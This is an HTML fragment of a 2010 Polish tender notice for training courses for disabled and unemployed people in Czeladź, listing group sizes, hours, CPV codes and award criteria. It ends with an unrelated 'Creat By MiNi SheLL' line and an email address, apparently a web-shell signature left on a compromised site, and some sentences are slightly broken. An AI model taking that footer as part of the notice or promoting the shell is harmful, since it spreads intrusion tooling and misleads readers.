<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SZKOLENIE WYJAZDOWE DLA OSÓB NIEPEŁNOSPRAWNYCH, Z ZAKRESU TRENINGU UMIEJĘTNOŚCI SPOŁECZNYCH
ORAZ INDYWIDUALNE I GRUPOWE DORADZTWA ZAWODOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób i czas trwania szkolenia
W szkoleniu powyższym będzie uczestniczyć grupa 10 osób niepełnosprawnych z umiarkowanym  i lekkim stopniem niepełnospraności (choroby układu oddechowego i krążenia, ruchowe, neurologiczne, psychiczne), będące w wieku aktywności zawodowej, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym. Realizacja szkolenia trwać będzie 7 dni (6 noclegów) i musi zakończyć się do 31.12.2010r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych umiejętności, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie.
Miejsce szkolenia
Miejsce szkolenia, a przede wszystkim jego odległość od Czeladzi powinna uwzględniać dysfunkcję uczestników, tj.: znajdować się w odległości nie sprawiającej niepożądanych skutków w czasie transportu max. 150km  Miejscowość powinna być atrakcyjna turystycznie.

Liczba godzin szkolenia należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 80.53.00.00-8, 85.31.23.20-8, 55.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie A
NAZWA SZKOLENIA:TRENING UMIEJĘTNOŚCI SPOŁECZNYCH + INDYWIDUALNE I GRUPOWE DORADZTWO ZAWODOWE + PORADNICTWO PRAWNE
TRENING UMIEJĘTNOŚCI SPOŁECZNYCH + INDYWIDUALNE I GRUPOWE DORADZTWO ZAWODOWE + PORADNICTWO PRAWNE
Zadanie B
NAZWA SZKOLENIA: TRENING UMIEJĘTNOŚCI SPOŁECZNYCH + INDYWIDUALNE I GRUPOWE DORADZTWO ZAWODOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie A
Liczba osób: 10 osób oraz 5 dzieci objętych opieką
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2010r
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. kładowa musi znajdować się w bliskiej odległości od tych miejsc. Koszty transportu ponosi Zamawiający.
Liczba godzin szkoleniaNależy przedstawić program wszystkich zajęć obejmujący minimum 70 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).Zajęcia  winny odbywać się od poniedziałku do piątku po max 7 godz. Lekcyjnych.
Zadanie B
Liczba osób:  30 osób.
Czas trwania szkolenia:  od dnia podpisania umowy do 31.12.2010r W szkoleniu powyższym będzie uczestniczyć grupa 30 osób. Realizacja szkolenia musi zakończyć się do 31.12.2010r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie.
Liczba godzin szkolenia należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 79.14.00.00-7, 85.31.23.20-8, 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS OCHRONY OSÓB I MIENIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie.
Liczba osób: 4 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r 
Liczba godzin szkolenia należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com